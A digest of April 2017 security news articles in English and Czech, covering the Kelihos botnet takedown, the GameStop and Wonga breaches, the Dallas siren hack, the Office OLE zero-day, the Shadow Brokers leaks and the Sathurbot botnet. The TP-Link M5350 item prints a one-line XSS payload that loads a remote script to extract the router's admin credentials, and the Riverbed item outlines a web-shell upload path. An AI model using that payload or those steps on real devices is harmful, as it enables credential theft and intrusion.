In parallel with the arrest, US justice authorities announced an extraordinary move to bring down the Kelihos network, obtaining warrants that allows it to install its own malware-like programs on computers in the network to intercept its operation.
Such a move appeared to be the first ever application of controversial new investigative powers which took effect late last year.
The Justice Department explained that its programs would be able to redirect Kelihos-infected computers into substitute servers in order to halt the network's operation.
In doing so, it can record the private IP or internet protocol addresses of the computers and provide them to internet service providers to help customers eliminate the infections, the department explained.
In a warrant that permitted investigators to "infect" botnet computers in order to block Kelihos, investigators pledged to guard the privacy of computer owners.
"This operation will not capture content from the target computers or modify them in any other capacity except limiting the target computers' ability to interact with the Kelihos botnet," the warrant said.
Hackers Steal Customer Card Data From GameStop
11.4.2017 securityweek Crime
Video gaming retail company GameStop appears to have been breached, with an unknown number of customers' payment card details stolen.
Those details are thought to include customer card number, expiration date, name, address and card verification value (CVV2), usually a 3-digit security code printed on the back of the card.
The breach is thought to affect only online customers at the website Gamespot.com, without affecting any of Gamestop's high street stores.
The breach was first reported by KrebsOnSecurity, Friday. Krebs blogged about the incident and also contacted GameStop, who immediately acknowledged the breach.
Two sources in the finance industry told Krebs they had received reports from a credit card processor indicating that GameStop had probably been compromised between September 2016 and February 2017. The credit card processor will undoubtedly have informed Gamestop; but the brevity of the 'security update' on the GameStop website suggests it has only recently become aware of the breach.
"GameStop recently received notification from a third party," says the statement, "that it believed payment card data from cards used on the GameStop.com website was being offered for sale on a website. That day a leading security firm was engaged to investigate these claims. GameStop has and will continue to work non-stop to address this report and take appropriate measures to eradicate any issue that may be identified."
Noticeably for a company that has lost customer data, there is no offer of free credit monitoring for those affected -- just the statement, "GameStop would like to remind its customers that it is always advisable to monitor payment card account statements for unauthorized charges." Hopefully, that simply means that Gamestop doesn't yet know which or how many of its customers were compromised.
What isn't yet clear is the extent of the breach. It is assumed that malware intercepted the card details before they were encrypted onsite. This assumption is based on the belief that the CVV2 code was also stolen. Since companies are not supposed to store this code, it is assumed the malware stole the details before it was discarded.
However, the reality is that hackers seem to have been in the system for at least five months, unnoticed. It is perfectly feasible that they were able to steal more than just the card details. Christopher Boyd, a malware intelligence analyst at Malwarebytes, told SecurityWeek, "Even without considering the ramifications of swiped payment information, any compromise of a company selling video games to the public could prove to be a huge boon for a scammer. If they could obtain lists of titles purchased, for example, they could try phishing for specific games that require a login. Beyond that, they could identify certain titles as running on a gaming platform -- again, with its own login credentials.
"From there, they could sell those accounts on at a profit, or use them to phish further gamers. In this case, the information currently available suggests scammers may 'only' have payment information, but the danger is there to cause untold problems for people if just a little more (seemingly harmless) data were to be included."
At the very least the incident demonstrates just how hard it is for defenders to detect an attacker once inside the system. Once again it seems that the breach was only uncovered by a third-party when the attackers started to monetize the theft.
Hacker Caused Panic in Dallas by Turning ON Every Emergency Siren at Once
10.4.2017 thehackernews Hacking
We have seen hackers flooding 911 emergency service with rogue requests to knock the service offline for an entire state, but some hacking incidents are worse than others.
One such incident took place in Dallas on Friday night when hacker triggered a network of 156 emergency warning sirens for about two hours, waking up residents and sparking fears of a disaster.
The emergency warning sirens — designed to warn citizens of the Texas about dangerous weather conditions, such as severe storms and tornados — were activated around 11:40 p.m. Friday and lasted until 1:20 a.m. Saturday.
The city officials tried to inform residents not to call 911 as there was not any emergency situation in the city, but the 911 system was nevertheless flooded with over 4,400 calls from panicked residents.
Rocky Vaz, director of Dallas Office of Emergency Management (OEM), told the Dallas Morning News that the alarms blasted about 15 times for 90-second durations. You can even watch video footage of the incident posted by some people on the social media.
The OEM technicians were eventually able to shut down the warning system and are working to keep this from happening again by implementing "more safeguards."
The city officials said the sirens were set off by a hacker who compromised the Dallas city's emergency alert system, but they did not disclose how the system was compromised or who may be responsible for the attack.
"We can state at this time that the City’s siren system was hacked Friday night," the Dallas Public Information Office confirmed on Saturday. "For security reasons, we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area."
The officials have notified the Federal Communications Commission (FCC) for assistance in identifying the exact source of the hack.
This is the second time when some hacker has attacked critical infrastructure in the city. Last year, some unknown hacker hacked into some traffic signals in Dallas and used them to publish jokes.
Dallas Mayor Mike Rawlings noted on his Facebook page that the incident is yet "another serious example of the need for us to upgrade and better safeguard our city’s technology infrastructure," adding that they’re working on identifying and prosecuting those responsible for the attack.
British Payday Loan Firm Wonga Suffers Data Breach
10.4.2017 securityweek CyberCrime
British payday loan company Wonga has informed customers that their personal and financial data may have been stolen in a cyberattack.
According to Wonga, hackers gained unauthorized access to names, email addresses, physical addresses, phone numbers, partial payment card numbers (i.e. the last four digits), bank account numbers, and sort codes. The firm’s investigation is ongoing.
Wonga says there is no evidence that passwords have been compromised, but users who are concerned can change their passwords as a precaution. Impacted individuals are being notified.
The Guardian reported that the incident may have affected as many as 270,000 current and former customers in the United Kingdom and Poland. Roughly 245,000 of the potential victims are from the U.K.
While complete payment card data is not at risk, Wonga says it will alert financial institutions, and it has advised customers to contact their bank and ask them to be on the lookout for any suspicious activity.
The company has also warned affected customers of scams and other online activities that may leverage this incident in an effort to trick users into handing over sensitive information.
This is one of the biggest known data breaches suffered by a U.K. company. In recent months, breaches have also been reported by Camelot, which runs the U.K. National Lottery, business software firm Sage, and telecoms company Three.
The country’s Information Commissioner's Office (ICO) has launched an investigation into the incident, and it could lead to a significant fine. Telecoms firm TalkTalk received a record fine of £400,000 (roughly half a million dollars) for the October 2015 breach that affected more than 150,000 customers. The ICO can issue a maximum fine of £500,000 ($620,000).
Hack Sets Off City Emergency Alarms in Dallas
10.4.2017 securityweek Cyber
The City of Dallas, Texas, emergency alarm system was compromised by a hacker or hackers late Friday night. All 156 outside sirens, usually used for severe weather warnings, were activated more than a dozen times between approximately 11:45 pm Friday and 1:20 am Saturday until engineers manually disabled the system.
The Dallas Outdoor Warning Sirens are designed to alert people outside to go indoors for shelter and information. The sirens are not meant to be heard indoors. Their primary function is to warn of imminent severe weather; but with no immediate sign of this, some people worried about reprisals for recent US military action in Syria.
The 911 emergency service, already under pressure through staff shortage, received approximately double its usual number of calls; and waiting time at its worst increased from the usual 10 seconds to around six minutes.
No details of the hack have yet been released, although it is believed the attacker is from the Dallas area. "For security reasons," said spokeswoman Sana Syed, "we cannot discuss the details of how this was done, but we do believe that the hack came from the Dallas area. We have notified the FCC for assistance in identifying the source of this hack. We are putting in safeguards to ensure this type of hack does not happen again."
Attacks against emergency alert systems are rare, but not unknown. In 2013, hackers breached an emergency alert system (EAS), causing TV stations in Michigan, California, Montana and New Mexico to broadcast a zombie warning, "the bodies of the dead are rising from their graves and attacking the living."
Dallas engineers are thought to have located the source of their own breach, and have ruled out both their control system and remote access. If the attacker breached the communications channels this could explain the belief that he or they are local to the area.
At the time of writing, the police had not been notified.
Dallas Mayor Mike Rawlings commented on Facebook, "This is yet another serious example of the need for us to upgrade and better safeguard our city's technology infrastructure. It's a costly proposition, which is why every dollar of taxpayer money must be spent with critical needs such as this in mind."
In November 2016, the City Council approved a $567,368 budget to maintain and repair the emergency sirens over the next six years. Michigan-based West Shore Services, a distributor of Federal Signal outdoor warning products, won the contract.
When approached over the weekend, West Shore's director of operations, Luke Miller, had not been informed of the breach by the Dallas Office of Emergency Management. "I am trying to get information along with everyone else," he said. "I don't know anything."
Martin Zinaich, chief security officer for the city of Tampa, Florida, told SecurityWeek, "We keep putting more and more 'things' (including critical infrastructure) on a public network that everyone in the world, both good and bad, have access to -- yet we still do not have information security being considered as part of a complete business risk profile."
Zinaich believes it is symptomatic of an ever-worsening cyber security condition that will require drastic action to solve. In a paper comparing cyber security to the long, slow descent and ultimate destruction of Eastern Air Lines Flight 401, he says, "In short, what we have put in place are insecure computing devices connected together using insecure protocols over a fabric connected to support some of our most critical dependencies and let anyone in the world -- good or bad -- have access to it."
His own solution would be for American CISOs to come together in a professional association, similar to the AMA, so that together they could influence the quality of security much as the AMA has influenced and improved the quality of medicine.
Serious Vulnerabilities Found in Riverbed SteelCentral Portal
10.4.2017 securityweek Vulnerebility
Researchers at vulnerability management services provider Digital Defense have identified four security holes in Riverbed SteelCentral, a popular application and network performance monitoring product.
The flaws affect the SteelCentral Portal application and they can be exploited by unauthenticated attackers for remote command execution and to obtain user information. The vulnerabilities were reported to Riverbed Technology in January and they were later patched by the vendor.
According to Digital Defense, there are two remote command execution vulnerabilities that can be exploited to take full control of the host running the SteelCentral Portal application, and from there hijack all connected data sources using administrator credentials.
One of the flaws, related to the UploadImageServlet function, can be exploited to upload arbitrary files to a directory that is remotely accessible. An attacker can upload a JavaServer Page (JSP) shell that allows execution of arbitrary commands with SYSTEM privileges.
The second RCE weakness is related to the H2 web console, a service that can be accessed remotely without authentication. In its advisory, Digital Defense said the H2 console is designed for access during development, but it’s still present in the default installation of the SteelCentral Portal.
Researchers determined that the console can be used to access the Portal’s PostgreSQL database – this database normally doesn’t allow remote connections, but the H2 console bypasses the restriction by connecting from localhost.
“Once connected to the PostgreSQL database, an attacker can create a new table; insert the file content for a JSP shell into the table, then export the table contents to a file in the root directory of the web application. An attacker can then gain access to a web shell without authentication, and run arbitrary commands with SYSTEM privileges,” Digital Defense said in its advisory.
Experts have also identified two information disclosure flaws that can be exploited by unauthenticated attackers to enumerate usernames. Once the usernames are obtained, a hacker can launch a brute-force attack against the SteelCentral Portal interface.
Researchers managed to exploit the vulnerabilities in versions 1.3.1 and 1.4.0. Riverbed customers can obtain information on the patches through the company’s support portal.
Another Russian Hacker Arrested In Spain Reportedly Over U.S. Election Hacking
10.4.2017 thehackernews CyberCrime
A Russian computer hacker and alleged spam kingpin was arrested in Barcelona, Spain, on Friday reportedly over suspicion of being involved in hacking attacks linked to alleged interference in last year's United States presidential election process.
36-year-old Pyotr Levashov from St. Petersburg was detained by police in Barcelona after US authorities issued an international arrest warrant for his arrest.
While the Russian embassy in Madrid announced Levashov's arrest on Sunday, it did not confirm the reason for his arrest.
This is the second arrest made by the Spanish authorities since the US 2016 election. In January, the police detained Stanislav Lisov, 32, on suspicion of creating and operating the NeverQuest Banking Trojan and possibly influencing the presidential election in Donald Trump's favor.
US authorities are planning to request the extradition of both hackers to the United State, where they are facing charges for their hacking-related crimes.
During an interview with Russian press agency RT, Levashov's wife Maria said that her husband was held "at the request of the American authorities in connection with cyber crime."
Maria spoke with Spanish officials, who mentioned "something about a virus that was supposedly created by [her] husband" and was related to Trump's victory in last year's presidential race.
Western security researchers have identified Levashov as Peter Severa (aka Peter Levashov) – the man who has also been listed in the world's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
Peter Carr, a spokesperson for the Criminal Division of the US Department of Justice, told the news agency that "the US case remains under seal, so [they] have no information to provide at this time."
The US government has repeatedly accused Russia of hacking Democratic party and leaking personal data in order to influence election results in favor of Donald Trump, though Russian officials have repeatedly denied the accusations.
Congressional committees and the Federal Bureau of Investigation are examining links between Russia and Trump.
Critical Office Zero-Day Exploited in Attacks
10.4.2017 securityweek Vulnerebility
An unpatched critical vulnerability in Microsoft Office is being exploited by malicious actors to achieve full code execution on target machines, McAfee and FireEye security researchers warn.
The vulnerability resides in the Object Linking and Embedding (OLE) functionality in Office and can be abused to create malicious RTF (Rich Text Format) documents that link to HTA (HTML Application) files hosted on remote servers. These HTA files load and execute a final malicious Visual Basic script.
“Because .hta is executable, the attacker gains full code execution on the victim’s machine,” McAfee explains, adding that the malicious RTF samples they observed were using the .doc extension.
Both McAfee and FireEye explain that this logical bug allows attackers to bypass memory-based mitigations developed by Microsoft, as well as other security products. The malicious documents are used to download and execute malicious payloads pertaining to various well-known malware families.
The HTA files used in the observed attacks were masquerading as normal RTF files to trick users and evade detection. When successful, the exploit closes the original Office document, then opens a new one and displays it to the victim, while the malicious code is being installed in the background.
“In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link,” FireEye explains.
The vulnerability was initially observed in January, but attacks that leverage it continue to surface, McAfee says. The security company said that all Office versions are affected by this issue, including Office 2016 on Windows 10.
According to FireEye, they too have been aware of the vulnerability for some time, but they have been coordinating with Microsoft for several weeks to release information on the matter only after a patch was available. Microsoft’s next set of security patches is scheduled to roll-out as soon as this Tuesday.
Users are advised to avoid opening Office files that come from unknown sources and to leave Office Protected View enabled to ensure no malicious code runs without their knowledge. Apparently, the vulnerability can’t bypass Protected View.
Alleged Kelihos Botnet Author Arrested in Spain
10.4.2017 securityweek BotNet
A Russian national arrested by the Spanish police last week is believed to be the programmer behind the infamous Kelihos spam botnet.
The man, Pyotr Levashov, was arrested in Barcelona, Spain, while on vacation, supposedly on an arrest warrant issued by United States authorities. The arrest has been already confirmed by the Russian embassy in Madrid, but no official details on why he was detained have been provided.
While mainstream media initially reported that the arrest might be tied to an interference in last year's U.S. election, it appears that Levashov was actually arrested for his involvement in the development and running of a large spam botnet.
In December 2016, the U.S. officially attributed election hacks to Russian threat groups, and also announced a series of sanctions against Russian nationals, also related to the election hacks. The attribution report, however, failed to achieve its purpose, security experts argued.
According to Reuters, Russian television station RT claimed a connection between Levashov’s arrest and the cybercriminal interference with the U.S. election, but a U.S. Department of Justice official has already confirmed that the arrest doesn’t have “an apparent national security connection.”
A NYTimes article also notes that Levashov doesn’t have an apparent connection to the election hacks, but that he is one of the most wanted spammers worldwide. Also known as Peter Severa, he is believed to be responsible for a long-running computer spam business.
Pyotr Levashov, who also uses the aliases Peter Severa and Peter of the North, is supposedly connected to the Waledac and Kelihos spam botnets, Brian Krebs reports. As he points out, Levashov is present on Spamhaus’ global Top 10 Worst Spammers.
Capable of sending around 1.5 billion spam messages a day, Waledac was taken down in 2010, but Kelihos emerged the same year, featuring many code similarities with the previous threat. However, the new malware variant wasn’t considered as part of the Waledac family, as it was a new and separate spam botnet.
Kelihos is currently one of the largest spam bots out there, and has been able to withstand several takedown attempts by security companies. Last year, the botnet was observed tripling its size overnight, and is currently placed first in Check Point’s Top 10 malware threats. Earlier this year, it also displayed worm-like distribution capabilities.
According to Krebs, while there is ample evidence tying Levashov to Waledac/Kelihos, the man is also believed to be connected to a series of criminal operations where malware authors and spammers were paid to install “fake antivirus” software that would display an overwhelming amount of alerts to victims, in an attempt to force them into buying bogus software.
Levashov is said to have made more money renting the spam botnets to other cybercriminals than running the email-blasting operations on his own. Reportedly, he would demand $300 per million messages promoting auction and employment scams, and $500 per million phishing emails. Recently, the Kelihos botnet was observed distributing ransomware.
Alleged Russian hacker arrested in Spain reportedly over US Presidential Election Hack
10.4.2017 securityaffairs CyberCrime
Spanish law enforcement arrested in Barcellona the Russian hacker Pyotr Levashov who is suspected of being involved in attacks on 2016 US Election.
Spanish law enforcement arrested in Barcelona the Russian hacker and alleged spam kingpin Pyotr Levashov (36). The man is suspected of being involved in hacking attacks against entities linked to the 2016 US Presidential Election.
The Russian embassy in Madrid confirmed the arrest of the suspect by did not disclose the reason for the arrest.
“Russian television station RT reported that Levashov was arrested under a U.S. international arrest warrant and was suspected of being involved in hacking attacks linked to alleged interference in last year’s U.S. election.” reported the Reuters Agency.
“Peter Carr, a spokesman for the U.S. Justice Department’s criminal division, said: “The U.S. case remains under seal, so we have no information to provide at this time.”
A U.S. Department of Justice official told the Reuters that the man was suspected of cyber crime and not of state-sponsored hacking.
Pyotr Levashov was detained by the Spanish police in Barcelona after the US authorities issued an international arrest warrant for the arrest of the Russian hacker.
The arrest of Levashov is the second one made by the Spanish police related to hackers suspected of being involved in the attacks against the US 2016 election. In January, the police
Early this year, the Spanish police arrested the hacker Stanislav Lisov (32) on suspicion of creating and distributing the dreaded NeverQuest Banking Trojan. The authorities believe it was also involved in the attacks against the US Presidential Election.
The Neverquest banking trojan, aka Vawtrak, is very popular in the criminal underground.It has been around for several years and was used to target of hundreds of financial institutions worldwide.
One of the last variants discovered in summer 2016 was spotted by experts from Fidelis firm. The new version of the Neverquest malware included significant improvements such as the SSL pinning and leverages on a DGA mechanism to generates .ru domains with a pseudorandom number generator (PRNG) discovered in the loader.
The US authorities are going to request the extradition of both hackers arrested in Spain to the United State.
Security experts linked Levashov to Peter Severa (aka Peter Levashov) one of the Top 10 Worst Spammers in the world.
The US government has repeatedly accused the Kremlin of hacking Democratic party in order to influence the final result of the election.
Downloadery a trojské koně ohrožují české uživatele nejčastěji
10.4.2017 SecurityWorld Viry
Škodlivý kód Danger se nevzdává -- tuzemských kybernetickým hrozbám dominuje už řadu měsíců. Kdy skončí jeho nadvláda?
Nápor škodlivých příloh e-mailů, kterými se šíří škodlivý kód Danger, nepolevuje. Ukazuje to průzkum, který uveřenil Eset. V březnu představovala tato internetová hrozba každý čtvrtý zachycený útok v České republice.
Oproti únoru se podíl tohoto malware na celkových internetových hrozbách zvýšil o pět procentních bodů a vrací se na hodnoty, které vykazoval v průběhu loňského roku.
„Danger je klasickým downloaderem, který může do napadeného zařízení stahovat další malware a různé druhy škodlivých kódů včetně ransomware. Z pohledu uživatele a prevence je důležité být obezřetný a neotevírat každou přílohu, zvláště pokud je vám odesílatel či samotný e-mail podezřelý,“ říká Miroslav Dvořák, technický ředitel Esetu.
Fakt, že se Danger v České republice drží tak dlouho na výsluní, podle Dvořáka dokládá, že jde o účinný malware, pomocí kterého si útočníci stále dokáží najít dost obětí.
Mezi downloadery patří i druhý v březnu nejčetněji zachycený malware Nemucod. Jeho podíl meziměsíčně vzrostl téměř na dvojnásobek únorové hodnoty, dosáhl takřka devíti procent. Novým zástupcem v přehledu deseti nejčastějších internetových hrozeb je trojský kůň Java/QRat.
„Jde o variantu Remote Acces Trojanu pro Javu. Utočníci ho využívají jako zadní vrátka pro vzdálený přístup do systému napadeného zařízení, obvykle k úniku citlivých dat,“ popisuje Dvořák.
Java/QRat může prohlížet soubory, zachytávat přihlašovací údaje, spouštět programy, aktivovat webové kamery a vyvíjet další aktivity na pozadí, aniž by o nich uživatel napadeného zařízení věděl.
Top 10 hrozeb v České republice za březen 2017:
1. JS/Danger.ScriptAttachment (25,90 %)
2. JS/TrojanDownloader.Nemucod (8,84 %)
3. Java/GRat (5,48 %)
4. Win32/Adware.ELEX (4,60 %)
5. JS/Chromex.Submeliux (2,39 %)
6. Win32/Deceptor.AdvancedSystemCare (1,72 %)
7. Java/Adwind (1,59 %)
8. Win32/Packed.VMProtect.ABO (1,57 %)
9. Win32/Obfuscated.NIT (1,53 %)
10. Win32/Packed.VMProtect.AAA (1,43 %)
Zdroj: Eset, duben 2017
Internetem se šíří zákeřný vir, který zneužívá dokumenty Office. Zaplata zatím chybí
10.4.2017 Živě.cz Viry
McAfee varuje před spouštěním dokumentů Office z neznámých zdrojů a když už, tak v bezpečném režimu, který nabízejí novější verze kancelářského balíku.
Nejbizarnější virus pro Android? Falešný Avast obalený falešným PornHubem, za který zaplatíte 100 dolarů
Podle McAfee se totiž sítí šíří zákeřný virus, na který zatím chybí záplata. Malware přitom dokáže zneužít doposud nezdokumentované zranitelnosti a obejít zabezpečení i na Office 2016 v kombinaci s Windows 10. Zneužití se tedy týká všech verzí Office a Windows.
Virus se šíří jako dokument Wordu v příloze e-mailu. Ve skutečnosti se však jedná o RTF soubor a v jeho nitru se skrývá zákeřný skript VBSA, který ze serveru útočníka stáhne webový soubor HTA, uvnitř kterého je opět RTF a další kód, který stáhne hromadu malwaru z dalších serverů.
Otevírání nechtěných dokumentů z pochybných zdrojů by nicméně měl být základní předpoklad nehledě na to, jestli obsahuje virus, anebo se jedná třeba o běžný spam.
Skupina Wikileaks zveřejnila další úniky ze CIA. Popisují tvorbu virů pro Windows
10.4.2017 Živě.cz BigBrother
Organizace Wikileaks uvolnila další várku úniků z americké Centrální zpravodajské agentury. Tentokrát se dokument věnuje sadě nástrojů Grasshopper, které údajně v CIA sloužily k tvorbě malwaru na míru pro operační systémy Windows.
Další várka úniků ze CIA. Wikileaks popisuje, jak se Američané údajně vydávají za Rusy, Číňany a další
Grasshopper tedy připomíná některé známé linuxové balíky jako třeba Metasploit. V obou případech se jedná o prostředí, ve kterém si pomocí desítek modulů sestavíte konkrétní útok, který pak skrze další nástroje a zranitelností dostanete na cíl oběti.
Vytvořili jsme malware pro Android, ovládli telefon a odposlouchávali jej
Grasshopper podle zveřejněných dokumentů dělá úplně to samé. CIA, NSA a další agentury nejen v USA tedy používají principiálně stejné postupy jako každý jiný bezpečnostní hacker a analytik. Podobně jako další podobné balíky i Grasshopper podle uniklé dokumentace běží v Pythonu
Žádné peníze, nový typ ransomwaru po vás chce vysoké skóre ve hře
10.4.2017 Živě.cz Viry
Ransomware je nepříjemná záležitost, která vám zablokuje počítač a nutí vás zaplatit určitou sumu peněz, jinak o všechna svá data přijdete. Zatím tento typ malwaru vždy vyžadoval po lidech finance. Rensenware ale peníze nevyžaduje – chce, aby lidé k odblokování počítače dosáhli vysokého skóre v anime hře.
Do nitra zákeřného ransomwaru. Takto vypadá útok na počítače personalistek
O podivném malwaru informoval jako první Malware Hunter Team na Twitteru. Pokud se podle něj počítač nakazí rensenware, stane se mu zcela to samé jako u klasického ransomware, tedy zablokuje se a zobrazí hlášku o možnostech, jak jej odblokovat.
Takové upozornění se objeví nakaženým počítačům
Místo zaplacení částky ale škodlivý kód chce, aby člověk získal 0,2 miliardy bodů v LUNATIC úrovni hry TH12 – Undefined Fantastic Object. To není úplně jednoduché, protože se jedná o jednu ze šílených japonských anime stříleček.
Jak je asi jasné, rensenware byl vytvořen spíš jako vtip než jako způsob, jak někomu ublížit. Jakmile se o malware začala zajímat média, přihlásil se k němu jeho tvůrce. Na Twitteru vystupuje pod jménem Tvple Eraser. „Byl to vtip, s kamarády jsme se tomu smáli. Kód jsem na internetu opravdu rozšířil. Někteří lidé to ale nepochopili a začali mě obviňovat. Tak se omlouvám… nechtěl jsem být zlý,“ napsal tvůrce.
Už se kradou i viry. Jeden ransomware využívá pirátskou kopii jiného
Omluva je zahrnuta i do nástroje, kterým lze rensenware odstranit. Zmanipuluje paměť hry tak, aby se člověk nemusel snažit skóre získat. Takže teoreticky pokud chcete, můžete si zkusit věc nainstalovat – původní „zlou“ verzi stejně autor stáhl, nová verze jasně říká, že se jedná o vtip.
How to get admin credentials from TP-Link M5350 3G/Wi-Fi modem with a text message
10.4.2017 securityaffairs Hacking
A German security researcher discovered how to retrieve the admin credentials from a TP-Link M5350 3G/Wi-Fi modem with an evil text message
Some bugs are very strange and dangerous, this is the case of a flaw affecting the TP-Link’s M5350 3G/Wi-Fi router that can expose admin credentials to an evil text message.
The bug was discovered by the security researcher Jan Hörsch from the German firm Securai, basically, it is a cross-site scripting (XSS) vulnerability that could be exploited by an attacker by simply sending an SMS containing the following attack script:
<script src=//n.ms/a.js></script>
“Among other things, he showed that the mobile router from TP-Link M5350 is permanently vulnerable to cross-site scripting, which is triggered by SMS. If an attacker sends an SMS with the appropriate content, the router answers with the login data of the admin – including the password in the plaintext.” reported the Heise.de.
Hörsch conducted an intensive research on various Internet-of-Things devices discovering multiple vulnerabilities. He analyzed the firmware running on several smart objects and discovered multiple bugs easy to exploit, the results of the research were presented at the recent Kaspersky Security Analyst Summit.
The flaw in the TP-Link’s M5350 3G/Wi-Fi modem appears like a feature created by developers, likely for testing purposes, unfortunately, it wasn’t removed in production.
The device’s admin credentials can be retrieved by an attacker with a simple text message, the router replies with admin username, admin password, its SSID, and its login password.
It is unlikely that the bug has been fixed by TP-Link, giving a look at the firmware download page for the TP-Link M5350 it is possible to verify that the most-recent version for the flawed device is M5350_V2_140115, released in January 2015.
Hörsch also analyzed a Panasonic BM ET200 retina scanner and a Startech modem, both devices affected by flaws.
Researchers warn of a Windows Zero-Day Attack observed in the wild
10.4.2017 securityaffairs Vulnerebility
Security researchers from firms McAfee and FireEye are warning of a Windows zero-day attack in the wild that put Microsoft users at risk of hack.
Security researchers from security firms McAfee and FireEye are warning of hackers exploiting an
Just opening an MS Word document could put you at risk, the exploitation of the flaw could allow an attacker to silently install a malware on a fully patched Windows machine.
The attack vectors are malicious emails that come with a weaponized Word document containing a booby-trapped OLE2link object.
“The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script.” reads the analysis shared by FireEye. “In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link. “The vulnerability is bypassing most mitigations”
When the user opens the document, the malicious code is executed, it first connects to a remote server to download a malicious HTML application file (HTA) that’s masquerading as a document created in Microsoft’s RTF (Rich Text Format).
Windows Zero-Day Attack
The HTA file is automatically executed automatically with attackers gaining full code execution on the target machine, downloading additional malicious payloads to fully compromise the machine.
The Windows zero-day attack leverage on .hta content that is disguised as a normal RTF file to evade security solutions, but researchers at McAfee spotted the malicious Visual Basic scripts in a later part of the file.
The exploit displays a decoy Word document for the victims to see before terminating to avoid suspicion.
“The successful exploit closes the bait Word document and pops up a fake one to show the victim. In the background, the malware has already been stealthily installed on the victim’s system.” reads a blog post published by McAfee.
“The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office. (Check our Black Hat USA 2015 presentation, in which we examine the attack surface of this feature.)”
This Window zero-day attack is very insidious, it doesn’t require victims interaction, for example, it doesn’t need victims enabling Macros.
The Window zero-day attack works on all Windows OS version, even against Windows 10.
The security firm reported the Windows zero-day attacks to Microsoft back in January 2017, for this reason, McAfee decided to publicly disclose the vulnerability and a day after also FireEye made the same.
This Tuesday Microsoft will release security updates, let’s hope the company will address also the zero-day exploited in the wild.
Below the recommendations to mitigate such kind of Windows zero-day attack:
Do not open any Office files obtained from untrusted locations.
According to our tests, this active attack cannot bypass the Office Protected View, so we suggest everyone ensure that Office Protected View is enabled.
Shadow Brokers Release More NSA Exploits
10.4.2017 securityweek BigBrothers
The hacker group calling itself “Shadow Brokers” has released another round of exploits and tools allegedly used by the NSA-linked threat actor “Equation Group,” along with a message to U.S. President Donald Trump.
Over the weekend, the group published the password to a previously released password-protected archive. An analysis of the files revealed the existence of various exploits and lists of organizations apparently targeted by the Equation Group.
Google Project Zero researcher Tavis Ormandy said one of the leaked exploits, dubbed EXACTCHANGE, relies on a Linux kernel vulnerability that can be exploited for local privilege escalation. Ormandy believes the Equation Group had the exploit “for years” before it was discovered by Google researchers in 2009.
An analysis conducted by Maksym Zaitsev showed that the leaked files include what appear to be Solaris exploits, a cross-platform RAT, Linux keyloggers, exploits targeting Cisco firewalls, system fingerprinting tools, an IP.Board exploit, and Apache and Samba zero-days affecting several Linux distributions.
A researcher who uses the online moniker “x0rz” also analyzed the latest dump and identified a tool that can clean logs (TOAST), a fake Chinese browser (ELECTRICSLIDE), and several GSM-related tools (CURSEHAPPY, EDITIONHAZE, LIQUIDSTEEL, SHAKENGIRAFFE, WHOLEBLUE). He also found evidence that the Equation Group had been looking for clues of attacks by other threat actors on compromised systems.
Experts also found lists of IP addresses and domain names that may belong to organizations targeted by the Equation Group, and they pointed out that victims include U.S. allies.
The Shadow Brokers had initially attempted to sell the exploits they obtained, but none of their strategies, including auctions and direct sale offers, was successful. While the group has now made available another batch of files for free, Zaitsev and others, including Edward Snowden, believe there are still some files that have not been released.
8 Apr
Edward Snowden ✔ @Snowden
Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so... (1/2)
Follow
Edward Snowden ✔ @Snowden
...much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal.
8:32 PM - 8 Apr 2017
881 881 Retweets 1,475 1,475 likes
In a message they posted on Medium, the Shadow Brokers told President Trump that they are disappointed by his actions.
“TheShadowBrokers voted for you,” the hackers said. “TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning ‘your base’, ‘the movement’, and the peoples who getting you elected.”
The group has once again claimed that it is not connected to Russia, but they did say that Russia and Putin are the United States’ “best allies until the common enemies are defeated and America is great again.”
However, some people have pointed out that the timing of the leak is suspicious – it comes shortly after the U.S. decided to bomb Syria, which is an ally of Russia. Some experts had previously suggested that the Shadow Brokers is actually an English-speaking group.
While many of the exploits leaked previously by Shadow Brokers turned out to rely on old vulnerabilities, some companies, including Cisco, did identify some zero-days. It remains to be seen if tech companies confirm any unpatched flaws in the latest leaks.
Sathurbot Botnet Targets WordPress Accounts
10.4.2017 securityweek BotNet
A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.
Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.
Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.
Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.
“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.
The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.
Sathurbot comes with some 5,000 plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results, and uses it for the next round of search queries. The second set of search results in used to harvest domain names.
The threat selects only the domains that are created using WordPress, but it appears that the threat is also interested in the Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks. The malware sends the harvested domains to the C&C.
